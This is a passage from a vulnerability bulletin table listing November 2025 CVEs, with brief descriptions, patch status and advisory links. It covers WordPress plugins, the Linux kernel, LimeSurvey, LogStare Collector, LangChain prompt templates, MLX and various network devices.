| jgwhite33--WP Google Review Slider | Missing Authorization vulnerability in jgwhite33 WP Google Review Slider wp-google-places-review-slider allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WP Google Review Slider: from n/a through <= 17.4. | 2025-11-21 | not yet calculated | CVE-2025-66063 | https://vdp.patchstack.com/database/Wordpress/Plugin/wp-google-places-review-slider/vulnerability/wordpress-wp-google-review-slider-plugin-17-4-broken-access-control-vulnerability?_s_id=cve   |
| jzeuzs--thread-amount | thread-amount is a tool that gets the amount of threads in the current process. Prior to version 0.2.2, there are resource leaks when querying thread counts on Windows and Apple platforms. In Windows platforms, the thread_amount function calls CreateToolhelp32Snapshot but fails to close the returned HANDLE using CloseHandle. Repeated calls to this function will cause the handle count of the process to grow indefinitely, eventually leading to system instability or process termination when the handle limit is reached. In Apple platforms, the thread_amount function calls task_threads (via Mach kernel APIs) which allocates memory for the thread list. The function fails to deallocate this memory using vm_deallocate. Repeated calls will result in a steady memory leak, eventually causing the process to be killed by the OOM (Out of Memory) killer. This issue has been patched in version 0.2.2. | 2025-11-21 | not yet calculated | CVE-2025-65947 | https://github.com/jzeuzs/thread-amount/security/advisories/GHSA-jf9p-2fv9-2jp2 https://github.com/jzeuzs/thread-amount/pull/29 https://github.com/jzeuzs/thread-amount/commit/28860d4a38286609cb884c13b5b7941edc2390e5   |
| KDDI CORPORATION--'' App for iOS | Improper certificate validation vulnerability exists in 'デジラアプリ' App for iOS prior to ver.80.10.00. If this vulnerability is exploited, a man-in-the-middle attack may allow an attacker to eavesdrop on and/or tamper with an encrypted communication. | 2025-11-17 | not yet calculated | CVE-2025-60022 | https://jvn.jp/en/jp/JVN54005037/   |
| Kriesi--Enfold | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kriesi Enfold enfold allows Stored XSS.This issue affects Enfold: from n/a through <= 7.1.2. | 2025-11-21 | not yet calculated | CVE-2025-66053 | https://vdp.patchstack.com/database/Wordpress/Theme/enfold/vulnerability/wordpress-enfold-theme-7-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| kubevirt--kubevirt | KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn't exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue. | 2025-11-18 | not yet calculated | CVE-2025-64324 | https://github.com/kubevirt/kubevirt/security/advisories/GHSA-46xp-26xh-hpqh https://github.com/kubevirt/kubevirt/pull/15037 https://github.com/kubevirt/kubevirt/commit/00d03e43e3bf03e563136695a4732b65ed42d764 https://github.com/kubevirt/kubevirt/commit/ff3b69b08b6b9c8d08d23735ca8d82455f790a69   |
| langchain-ai--langchain | LangChain is a framework for building agents and LLM-powered applications. From versions 0.3.79 and prior and 1.0.0 to 1.0.6, a template injection vulnerability exists in LangChain's prompt template system that allows attackers to access Python object internals through template syntax. This vulnerability affects applications that accept untrusted template strings (not just template variables) in ChatPromptTemplate and related prompt template classes. This issue has been patched in versions 0.3.80 and 1.0.7. | 2025-11-21 | not yet calculated | CVE-2025-65106 | https://github.com/langchain-ai/langchain/security/advisories/GHSA-6qv9-48xg-fc7f https://github.com/langchain-ai/langchain/commit/c4b6ba254e1a49ed91f2e268e6484011c540542a https://github.com/langchain-ai/langchain/commit/fa7789d6c21222b85211755d822ef698d3b34e00   |
| LimeSurvey--LimeSurvey | Vulnerability in LimeSurvey 6.13.0 in the endpoint /optout that causes infinite HTTP redirects when accessed directly. This behavior can be exploited to generate a Denegation of Service (DoS attack), by exhausting server or client resources. The system is unable to break the redirect loop, which can cause service degradation or browser instability. | 2025-11-20 | not yet calculated | CVE-2025-41074 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-limesurvey-0   |
| LimeSurvey--LimeSurvey | Vulnerability in LimeSurvey 6.13.0 in the endpoint /optin that causes infinite HTTP redirects when accessed directly. This behavior can be exploited to generate a Denegation of Service (DoS attack), by exhausting server or client resources. The system is unable to break the redirect loop, which can cause service degradation or browser instability. | 2025-11-20 | not yet calculated | CVE-2025-41075 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-limesurvey-0   |
| LimeSurvey--LimeSurvey | In version 6.13.0 of LimeSurvey, any external user can cause a 500 error in the survey system by sending a malformed session cookie. Instead of displaying a generic error message, the system exposes internal backend information, including the use of the Yii framework, the MySQL/MariaDB database engine, the table name 'lime_sessions', primary keys, and fragments of the content that caused the conflict. This information can simplify the collection of data about the internal architecture of the application by an attacker. | 2025-11-20 | not yet calculated | CVE-2025-41076 | https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-limesurvey-0   |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix memory leak of qgroup_list in btrfs_add_qgroup_relation When btrfs_add_qgroup_relation() is called with invalid qgroup levels (src >= dst), the function returns -EINVAL directly without freeing the preallocated qgroup_list structure passed by the caller. This causes a memory leak because the caller unconditionally sets the pointer to NULL after the call, preventing any cleanup. The issue occurs because the level validation check happens before the mutex is acquired and before any error handling path that would free the prealloc pointer. On this early return, the cleanup code at the 'out' label (which includes kfree(prealloc)) is never reached. In btrfs_ioctl_qgroup_assign(), the code pattern is: prealloc = kzalloc(sizeof(*prealloc), GFP_KERNEL); ret = btrfs_add_qgroup_relation(trans, sa->src, sa->dst, prealloc); prealloc = NULL; // Always set to NULL regardless of return value ... kfree(prealloc); // This becomes kfree(NULL), does nothing When the level check fails, 'prealloc' is never freed by either the callee or the caller, resulting in a 64-byte memory leak per failed operation. This can be triggered repeatedly by an unprivileged user with access to a writable btrfs mount, potentially exhausting kernel memory. Fix this by freeing prealloc before the early return, ensuring prealloc is always freed on all error paths. | 2025-11-21 | not yet calculated | CVE-2025-40209 | https://git.kernel.org/stable/c/3412d0e973e8f8381747d69033eda809a57a2581 https://git.kernel.org/stable/c/a4d9ebe23bcb79d9d057e3c995db73b7b3aae414 https://git.kernel.org/stable/c/f260c6aff0b8af236084012d14f9f1bf792ea883   |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "NFSD: Remove the cap on number of operations per NFSv4 COMPOUND" I've found that pynfs COMP6 now leaves the connection or lease in a strange state, which causes CLOSE9 to hang indefinitely. I've dug into it a little, but I haven't been able to root-cause it yet. However, I bisected to commit 48aab1606fa8 ("NFSD: Remove the cap on number of operations per NFSv4 COMPOUND"). Tianshuo Han also reports a potential vulnerability when decoding an NFSv4 COMPOUND. An attacker can place an arbitrarily large op count in the COMPOUND header, which results in: [ 51.410584] nfsd: vmalloc error: size 1209533382144, exceeds total pages, mode:0xdc0(GFP_KERNEL|__GFP_ZERO), nodemask=(null),cpuset=/,mems_allowed=0 when NFSD attempts to allocate the COMPOUND op array. Let's restore the operation-per-COMPOUND limit, but increased to 200 for now. | 2025-11-21 | not yet calculated | CVE-2025-40210 | https://git.kernel.org/stable/c/b3ee7ce432289deac87b9d14e01f2fe6958f7f0b https://git.kernel.org/stable/c/3e7f011c255582d7c914133785bbba1990441713   |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ACPI: video: Fix use-after-free in acpi_video_switch_brightness() The switch_brightness_work delayed work accesses device->brightness and device->backlight, freed by acpi_video_dev_unregister_backlight() during device removal. If the work executes after acpi_video_bus_unregister_backlight() frees these resources, it causes a use-after-free when acpi_video_switch_brightness() dereferences device->brightness or device->backlight. Fix this by calling cancel_delayed_work_sync() for each device's switch_brightness_work in acpi_video_bus_remove_notify_handler() after removing the notify handler that queues the work. This ensures the work completes before the memory is freed. [ rjw: Changelog edit ] | 2025-11-21 | not yet calculated | CVE-2025-40211 | https://git.kernel.org/stable/c/4e85246ec0d019dfba86ba54d841ef6694f97149 https://git.kernel.org/stable/c/de5fc93275a4a459fe2f7cb746984f2ab3e8292a https://git.kernel.org/stable/c/293125536ef5521328815fa7c76d5f9eb1635659 https://git.kernel.org/stable/c/8f067aa59430266386b83c18b983ca583faa6a11   |
| Lite XL--Lite XL | Lite XL versions 2.1.8 and prior automatically execute the .lite_project.lua file when opening a project directory, without prompting the user for confirmation. The .lite_project.lua file is intended for project-specific configuration but can contain executable Lua logic. This behavior could allow execution of untrusted Lua code if a user opens a malicious project, potentially leading to arbitrary code execution with the privileges of the Lite XL process. | 2025-11-20 | not yet calculated | CVE-2025-12120 | https://github.com/lite-xl/lite-xl/pull/2164 https://kb.cert.org/vuls/id/579478   |
| Lite XL--Lite XL | Lite XL versions 2.1.8 and prior contain a vulnerability in the system.exec function, which allowed arbitrary command execution through unsanitized shell command construction. This function was used in project directory launching (core.lua), drag-and-drop file handling (rootview.lua), and the "open in system" command in the treeview plugin (treeview.lua). If an attacker could influence input to system.exec, they might execute arbitrary commands with the privileges of the Lite XL process. | 2025-11-20 | not yet calculated | CVE-2025-12121 | https://github.com/lite-xl/lite-xl/pull/2163 https://kb.cert.org/vuls/id/579478   |
| LogStare Inc.--Installer of LogStare Collector (for Windows) | Uncontrolled search path element issue exists in the installer of LogStare Collector (for Windows). If exploited, arbitrary code may be executed with the privilege of the user invoking the installer. | 2025-11-21 | not yet calculated | CVE-2025-64695 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | The installation directory of LogStare Collector is configured with incorrect access permissions. A non-administrative user may manipulate files within the installation directory and execute arbitrary code with the administrative privilege. | 2025-11-21 | not yet calculated | CVE-2025-58097 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | LogStare Collector contains a stored cross-site scripting vulnerability in UserManagement. If crafted user information is stored, an arbitrary script may be executed on the web browser of the user who logs in to the product's management page. | 2025-11-21 | not yet calculated | CVE-2025-61949 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | LogStare Collector contains an incorrect authorization vulnerability in UserRegistration. If exploited, a non-administrative user may create a new user account by sending a crafted HTTP request. | 2025-11-21 | not yet calculated | CVE-2025-62189 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | Cross-site request forgery vulnerability exists in LogStare Collector. If a user views a crafted page while logged, unintended operations may be performed. | 2025-11-21 | not yet calculated | CVE-2025-62687 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| LogStare Inc.--LogStare Collector (for Windows) | LogStare Collector improperly handles the password hash data. An administrative user may obtain the other users' password hashes. | 2025-11-21 | not yet calculated | CVE-2025-64299 | https://www.logstare.com/vulnerability/2025-001/ https://jvn.jp/en/jp/JVN77560819/   |
| Lookyloo--lookyloo | Lookyloo is a web interface that allows users to capture a website page and then display a tree of domains that call each other. Prior to version 1.35.1, there is potential cross-site scripting on index and tree page. This issue has been patched in version 1.35.1. | 2025-11-19 | not yet calculated | CVE-2025-65095 | https://github.com/Lookyloo/lookyloo/security/advisories/GHSA-m9g6-23c8-vrxf https://github.com/Lookyloo/lookyloo/commit/ac2f73dbfcad88b815b18c42cca77a1c645f1726 https://github.com/Lookyloo/lookyloo/blob/main/website/web/default_csp.py https://vulnerability.circl.lu/vuln/gcve-1-2025-0018   |
| Lynxtechnology--Twonky Server | Twonky Server 8.5.2 on Linux and Windows is vulnerable to an access control flaw. An unauthenticated attacker can bypass web service API authentication controls to leak a log file and read the administrator's username and encrypted password. | 2025-11-19 | not yet calculated | CVE-2025-13315 | https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/   |
| Lynxtechnology--Twonky Server | Twonky Server 8.5.2 on Linux and Windows is vulnerable to a cryptographic flaw, use of hard-coded cryptographic keys. An attacker with knowledge of the encrypted administrator password can decrypt the value with static keys to view the plain text password and gain administrator-level access to Twonky Server. | 2025-11-19 | not yet calculated | CVE-2025-13316 | https://www.rapid7.com/blog/post/cve-2025-13315-cve-2025-13316-critical-twonky-server-authentication-bypass-not-fixed/   |
| M-Files Corporation--M-Files Server | Denial-of-service condition in M-Files Server versions before 25.11.15392.1, before 25.2 LTS SR2 and before 25.8 LTS SR2 allows an authenticated user to cause the MFserver process to crash. | 2025-11-17 | not yet calculated | CVE-2025-11681 | https://product.m-files.com/security-advisories/cve-2025-11681/   |
| magepeopleteam--WpEvently | Missing Authorization vulnerability in magepeopleteam WpEvently mage-eventpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WpEvently: from n/a through <= 5.0.4. | 2025-11-21 | not yet calculated | CVE-2025-66082 | https://vdp.patchstack.com/database/Wordpress/Plugin/mage-eventpress/vulnerability/wordpress-wpevently-plugin-5-0-4-broken-access-control-vulnerability?_s_id=cve   |
| magepeopleteam--WpEvently | Missing Authorization vulnerability in magepeopleteam WpEvently mage-eventpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WpEvently: from n/a through <= 5.0.4. | 2025-11-21 | not yet calculated | CVE-2025-66083 | https://vdp.patchstack.com/database/Wordpress/Plugin/mage-eventpress/vulnerability/wordpress-wpevently-plugin-5-0-4-broken-access-control-vulnerability-2?_s_id=cve   |
| MatrixAddons--Easy Invoice | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in MatrixAddons Easy Invoice easy-invoice allows PHP Local File Inclusion.This issue affects Easy Invoice: from n/a through <= 2.1.4. | 2025-11-21 | not yet calculated | CVE-2025-66115 | https://vdp.patchstack.com/database/Wordpress/Plugin/easy-invoice/vulnerability/wordpress-easy-invoice-plugin-2-1-4-local-file-inclusion-vulnerability?_s_id=cve   |
| Merlot Digital (by TNC)--TNC Toolbox: Web Performance | Missing Authorization vulnerability in Merlot Digital (by TNC) TNC Toolbox: Web Performance tnc-toolbox allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TNC Toolbox: Web Performance: from n/a through <= 2.0.4. | 2025-11-21 | not yet calculated | CVE-2025-66108 | https://vdp.patchstack.com/database/Wordpress/Plugin/tnc-toolbox/vulnerability/wordpress-tnc-toolbox-web-performance-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve   |
| mindersec--minder | Minder is an open source software supply chain security platform. In Minder Helm version 0.20241106.3386+ref.2507dbf and Minder Go versions from 0.0.72 to 0.0.83, Minder users may fetch content in the context of the Minder server, which may include URLs which the user would not normally have access to. This issue has been patched in Minder Helm version 0.20250203.3849+ref.fdc94f0 and Minder Go version 0.0.84. | 2025-11-21 | not yet calculated | CVE-2025-65109 | https://github.com/mindersec/minder/security/advisories/GHSA-6xvf-4vh9-mw47 https://github.com/mindersec/minder/commit/f770400923984649a287d7215410ef108e845af8   |
| ml-explore--mlx | MLX is an array framework for machine learning on Apple silicon. Prior to version 0.29.4, there is a heap buffer overflow in mlx::core::load() when parsing malicious NumPy .npy files. Attacker-controlled file causes 13-byte out-of-bounds read, leading to crash or information disclosure. This issue has been patched in version 0.29.4. | 2025-11-21 | not yet calculated | CVE-2025-62608 | https://github.com/ml-explore/mlx/security/advisories/GHSA-w6vg-jg77-2qg6 https://github.com/ml-explore/mlx/pull/1 https://github.com/ml-explore/mlx/pull/2   |
| ml-explore--mlx | MLX is an array framework for machine learning on Apple silicon. Prior to version 0.29.4, there is a segmentation fault in mlx::core::load_gguf() when loading malicious GGUF files. Untrusted pointer from external gguflib library is dereferenced without validation, causing application crash. This issue has been patched in version 0.29.4. | 2025-11-21 | not yet calculated | CVE-2025-62609 | https://github.com/ml-explore/mlx/security/advisories/GHSA-j842-xgm4-wf88   |
| n/a--Ascertia SigningHub through 8.6.8 | In Ascertia SigningHub through 8.6.8, there is a lack of rate limiting on the invite user function, leading to an email bombing vulnerability. An authenticated attacker can exploit this by automating invite requests. | 2025-11-18 | not yet calculated | CVE-2025-54320 | https://www.ascertia.com/company/vulnerability-disclosure-policy/ https://github.com/saykino/CVE-2025-54320   |
| n/a--Ascertia SigningHub through 8.6.8 | In Ascertia SigningHub through 8.6.8, there is a lack of rate limiting on the reset password function, leading to an email bombing vulnerability. An authenticated attacker can exploit this by automating reset password requests. | 2025-11-18 | not yet calculated | CVE-2025-54321 | https://www.ascertia.com/company/vulnerability-disclosure-policy/ https://github.com/saykino/CVE-2025-54321   |
| n/a--Awesome Miner thru 11.2.4 | A vulnerability was discovered in Awesome Miner thru 11.2.4 that allows arbitrary read and write to kernel memory and MSRs (such as LSTAR) as an unprivileged user. This is due to the implementation of an insecure version of WinRing0 (1.2.0.5, renamed to IntelliBreeze.Maintenance.Service.sys) that lacks a properly secured DACL, allowing unprivileged users to interact with the driver and, as a result, the kernel. This can result in local privilege escalation, information disclosure, denial of service, and other unspecified impacts. | 2025-11-18 | not yet calculated | CVE-2025-63602 | https://www.awesomeminer.com/download https://dreadsec.co/p/cve-2025-63602-hijacking-system-calls-with-a-popular-crypto-miner.html   |
| n/a--Axel Technology puma devices (firmware versions 0.8.5 to 1.0.3) | The Axel Technology puma devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device. | 2025-11-19 | not yet calculated | CVE-2025-63221 | https://www.axeltechnology.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63221_Axel%20Technology%20puma%20-%20Broken%20Access%20Control   |
| n/a--Axel Technology StreamerMAX MK II devices (firmware versions 0.8.5 to 1.0.3) | The Axel Technology StreamerMAX MK II devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device. | 2025-11-19 | not yet calculated | CVE-2025-63223 | https://www.axeltechnology.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63223_Axel%20Technology%20StreamerMAX%20MK%20II%20-%20Broken%20Access%20Control   |
| n/a--Axel Technology WOLF1MS and WOLF2MS devices | The Axel Technology WOLF1MS and WOLF2MS devices (firmware versions 0.8.5 to 1.0.3) are vulnerable to Broken Access Control due to missing authentication on the /cgi-bin/gstFcgi.fcgi endpoint. Unauthenticated remote attackers can list user accounts, create new administrative users, delete users, and modify system settings, leading to full compromise of the device. | 2025-11-19 | not yet calculated | CVE-2025-63218 | https://www.axeltechnology.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63218_Axel%20Technology%20WOLF1MS%20and%20WOLF2MS%20-%20Broken%20Access%20Control   |
| n/a--Backdrop CMS 1.32.1 | Host Header Injection vulnerability in Backdrop CMS 1.32.1 allows attackers to manipulate the Host header in password reset requests, leading to redirects to malicious domains and potential session hijacking via cookie injection. | 2025-11-18 | not yet calculated | CVE-2025-63828 | https://github.com/mertdurum06/BackdropCms-1.32.1/ https://github.com/mertdurum06/BackdropCms-1.32.1/blob/main/backdropcms_exploit.txt   |
| n/a--bridgetech | An issue was discovered in bridgetech probes VB220 IP Network Probe,VB120 Embedded IP + RF Probe, VB330 High-Capacity Probe, VB440 ST 2110 Production Analytics Probe, and NOMAD, firmware versions 6.5.0-9, allowing attackers to gain sensitive information such as administrator passwords via the /probe/core/setup/passwd endpoint. | 2025-11-19 | not yet calculated | CVE-2025-63205 | https://bridgetech.tv/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63205_bridgetech%20probes%20Information%20Disclosure   |
| n/a--bridgetech VB288 | An issue was discovered in bridgetech VB288 Objective QoE Content Extractor, firmware version 5.6.0-8, allowing attackers to gain sensitive information such as administrator passwords via the /probe/core/setup/passwd endpoint. | 2025-11-19 | not yet calculated | CVE-2025-63208 | https://bridgetech.tv/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63208_bridgetech%20VB288%20Information%20Disclosure   |
| n/a--bridgetech VBC Server & Element Manager | Stored cross-site scripting vulnerability in bridgetech VBC Server & Element Manager, firmware versions 6.5.0-9 thru 6.5.0-10, allows attackers to execute arbitrary code via the addName parameter to the /vbc/core/userSetupDoc/userSetupDoc endpoint. | 2025-11-19 | not yet calculated | CVE-2025-63211 | https://bridgetech.tv/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63211_bridgetech%20VBC%20Server%20and%20Element%20Manager%20Stored%20%20xss   |
| n/a--bridgetech VBC Server & Element Manager | An issue was discovered in bridgetech VBC Server & Element Manager, firmware version 6.5.0-10 , 6.5.0-9, allowing unauthorized attackers to delete and create arbitrary accounts. | 2025-11-19 | not yet calculated | CVE-2025-63214 | https://bridgetech.tv/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63214_bridgetech%20VBC%20Server%20and%20Element%20Manager%20Broken%20Access%20Control   |
| n/a--Campcodes Online Hospital Management System 1.0  | Campcodes Online Hospital Management System 1.0 is vulnerable to SQL Injection in /admin/index.php via the parameter username. | 2025-11-19 | not yet calculated | CVE-2025-63719 | https://github.com/Pei4AN/CVE/issues/6   |
| n/a--Clerk-js 5.88.0 | An issue was discovered in Clerk-js 5.88.0 allowing attackers to bypass the OAuth authentication flow by manipulating the request at the OTP verification stage. | 2025-11-20 | not yet calculated | CVE-2025-63700 | https://clerk.com https://github.com/itsnishat08/CVE-2025-63700   |
| n/a--couch-auth 0.21.2 | Session tokens and passwords in couch-auth 0.21.2 are stored in JavaScript objects and remain in memory without explicit clearing in src/user.ts lines 700-707. This creates a window of opportunity for sensitive data extraction through memory dumps, debugging tools, or other memory access techniques, potentially leading to session hijacking. | 2025-11-20 | not yet calculated | CVE-2025-60794 | https://www.npmjs.com/package/@perfood/couch-auth https://github.com/perfood/couch-auth https://github.com/pr0wl1ng/security-advisories/blob/main/CVE-2025-60794.md   |
| n/a--D-Link Router DIR-868L | D-Link Router DIR-868L A1 FW106KRb01.bin has an unauthenticated remote code execution vulnerability in the cgibin binary. The HNAP service provided by cgibin does not filter the HTTP SOAPAction header field. The unauthenticated remote attacker can execute the shell command. | 2025-11-19 | not yet calculated | CVE-2025-63932 | https://www.dlink.com/en/security-bulletin/ https://github.com/WhereisRain/DIR-868/tree/main https://github.com/WhereisRain/DIR-868   |
| n/a--Dasan Switch DS2924 | An authentication bypass issue was discovered in Dasan Switch DS2924 web based interface, firmware versions 1.01.18 and 1.02.00, allowing attackers to gain escalated privileges via storing crafted cookies in the web browser. | 2025-11-19 | not yet calculated | CVE-2025-63206 | http://dasansmc.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63206_Dasan%20Switch%20DS2924%20Authentication%20Bypass   |
| n/a--DzzOffice 2.3.x | The comment editing template (dzz/comment/template/edit_form.htm) in DzzOffice 2.3.x lacks adequate security escaping for user-controllable data in multiple contexts, including HTML and JavaScript strings. This allows low-privilege attackers to construct comment content or request parameters and execute arbitrary JavaScript code when the victim opens the editing pop-up. | 2025-11-18 | not yet calculated | CVE-2025-63693 | https://github.com/Yohane-Mashiro/dzzoffice_xss https://github.com/zyx0814/dzzoffice/issues/363   |
| n/a--DzzOffice v2.3.7 | DzzOffice v2.3.7 and before is vulnerable to SQL Injection in explorer/groupmanage. | 2025-11-18 | not yet calculated | CVE-2025-63694 | https://github.com/zyx0814/dzzoffice/issues/364 https://github.com/Yohane-Mashiro/dzzoffice_sql   |
| n/a--DzzOffice v2.3.7 | DzzOffice v2.3.7 and before is vulnerable to Arbitrary File Upload in /dzz/system/ueditor/php/controller.php. | 2025-11-18 | not yet calculated | CVE-2025-63695 | https://github.com/zyx0814/dzzoffice/issues/365 https://github.com/Yohane-Mashiro/dzzoffice_upload   |
| n/a--E-commerce Project v1.0 | A reflected cross-site scripted (XSS) vulnerability in the /ecommerce/products.php component of E-commerce Project v1.0 and earlier allows attackers to execute arbitrary Javascript in the context of a user's browser via injecting a crafted payload into the id parameter. | 2025-11-19 | not yet calculated | CVE-2025-63879 | https://www.linkedin.com/in/rumana-khatun-208aa731b/ https://github.com/rumanaemu/CVE-Research/blob/main/CVE-2025-63879.md   |
| n/a--ELCA Star Transmitter | The ELCA Star Transmitter Remote Control firmware 1.25 for STAR150, BP1000, STAR300, STAR2000, STAR1000, STAR500, and possibly other models, contains an information disclosure vulnerability allowing unauthenticated attackers to retrieve admin credentials and system settings via an unprotected /setup.xml endpoint. The admin password is stored in plaintext under the <p05> XML tag, potentially leading to remote compromise of the transmitter system. | 2025-11-19 | not yet calculated | CVE-2025-63209 | https://www.elcaradio.com https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63209_ELCA%20Star%20Transmitter%20Remote%20Control%20-%20Information%20Disclosure   |
| n/a--electic-shop v1.0 | A DOM-based cross-site scripting vulnerability exists in electic-shop v1.0 (Bhabishya-123/E-commerce). The site's client-side JavaScript reads attacker-controlled input (for example, values derived from the URL or page fragment) and inserts it into the DOM via unsafe sinks (innerHTML/insertAdjacentHTML/document.write) without proper sanitization or context-aware encoding. An attacker can craft a malicious URL that, when opened by a victim, causes arbitrary JavaScript to execute in the victim's browser under the electic-shop origin. | 2025-11-18 | not yet calculated | CVE-2025-63883 | https://github.com/minhajultaivin/security-advisories/blob/main/CVE-2025-63883.md   |
| n/a--eProsima Fast-DDS v3.3 | eProsima Fast-DDS v3.3 and before has an infinite loop vulnerability caused by integer overflow in the Time_t:: fraction() function. | 2025-11-18 | not yet calculated | CVE-2025-63829 | https://github.com/eProsima/Fast-DDS/blob/master/src/cpp/fastdds/core/Time_t.cpp#L67 https://gist.github.com/lkloliver/b00377bec754d4aa1dc731be210d5889   |
| n/a--Eurolab ELTS100_UBX device (firmware version ELTS100v1.UBX) | The Eurolab ELTS100_UBX device (firmware version ELTS100v1.UBX) is vulnerable to Broken Access Control due to missing authentication on critical administrative endpoints. Attackers can directly access and modify sensitive system and network configurations, upload firmware, and execute unauthorized actions without any form of authentication. This vulnerability allows remote attackers to fully compromise the device, control its functionality, and disrupt its operation. | 2025-11-18 | not yet calculated | CVE-2025-63225 | http://eurolab-srl.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63225_Eurolab_ELTS100_UBX_Broken_Access_Control   |
| n/a--FileCodeBox v2.2 | A path Traversal vulnerability found in FileCodeBox v2.2 and earlier allows arbitrary file writes when application is configured to use local filesystem storage. SystemFileStorage.save_file method in core/storage.py uses filenames from user input without validation to construct save_path and save files. This allows remote attackers to perform arbitrary file writes outside the intended directory by sending crafted POST requests with malicious traversal sequences to /share/file/ upload endpoint, which does not require any authorization. | 2025-11-19 | not yet calculated | CVE-2025-51661 | https://github.com/vastsa/FileCodeBox https://github.com/vastsa/FileCodeBox/issues/349   |
| n/a--FileCodeBox version 2.2 and earlier | A stored cross-site scripting (XSS) vulnerability is found in the text sharing feature of FileCodeBox version 2.2 and earlier. Insufficient input validation allows attackers to inject arbitrary JavaScript code into shared text "codeboxes". The xss payload is automatically executed in the browsers of any users who try to access the infected codebox by clicking link or entering share code. | 2025-11-19 | not yet calculated | CVE-2025-51662 | https://github.com/vastsa/FileCodeBox https://github.com/vastsa/FileCodeBox/issues/351   |
| n/a--FileCodeBox version 2.2 and earlier | A vulnerability found in IPRateLimit implementation of FileCodeBox up to 2.2 allows remote attackers to bypass ip-based rate limit protection and failed attempt restrictions by faking X-Real-IP and X-Forwarded-For HTTP headers. This can enable attackers to perform DoS attacks or brute force share codes. | 2025-11-19 | not yet calculated | CVE-2025-51663 | https://github.com/vastsa/FileCodeBox https://github.com/vastsa/FileCodeBox/issues/350   |
| n/a--Freebox v5 HD (firmware = 1.7.20), Freebox v5 Crystal (firmware = 1.7.20), Freebox v6 Révolution r1-r3 (firmware = 4.7.x), Freebox Mini 4K (firmware = 4.7.x), and Freebox One (firmware = 4.7.x) | Freebox v5 HD (firmware = 1.7.20), Freebox v5 Crystal (firmware = 1.7.20), Freebox v6 Révolution r1-r3 (firmware = 4.7.x), Freebox Mini 4K (firmware = 4.7.x), and Freebox One (firmware = 4.7.x) were discovered to expose subscribers' IMSI identifiers in plaintext during the initial phase of EAP-SIM authentication over the `FreeWifi_secure` network. During the EAP-Response/Identity exchange, the subscriber's full Network Access Identifier (NAI), which embeds the raw IMSI, is transmitted without encryption, tunneling, or pseudonymization. An attacker located within Wi-Fi range (~100 meters) can passively capture these frames without requiring user interaction or elevated privileges. The disclosed IMSI enables device tracking, subscriber correlation, and long-term monitoring of user presence near any broadcasting Freebox device. The vendor acknowledged the vulnerability, and the `FreeWifi_secure` service is planned for full deactivation by 1 October 2025. | 2025-11-17 | not yet calculated | CVE-2025-63292 | https://gist.github.com/7h30th3r0n3/1a0fadb19f1528e3d3f6bad9f680c3b0#file-cve-2025-63292-frebox-imsi-md https://7h30th3r0n3.fr/the-vulnerability-that-killed-freewifi_secure/   |
| n/a--GatesAir Flexiva-LX devices on firmware 1.0.13 and 2.0, including models LX100, LX300, LX600, and LX1000 | GatesAir Flexiva-LX devices on firmware 1.0.13 and 2.0, including models LX100, LX300, LX600, and LX1000, expose sensitive session identifiers (sid) in the publicly accessible log file located at /log/Flexiva%20LX.log. An unauthenticated attacker can retrieve valid session IDs and hijack sessions without providing any credentials. This attack requires the legitimate user (admin) to have previously closed the browser window without logging out. | 2025-11-19 | not yet calculated | CVE-2025-63212 | https://www.gatesair.com/ https://github.com/shiky8/my--cve-vulnerability-research/tree/main/CVE-2025-63212%20_GatesAir%20Flexiva-LX%20Series%20_%20Session%20Hijacking   |
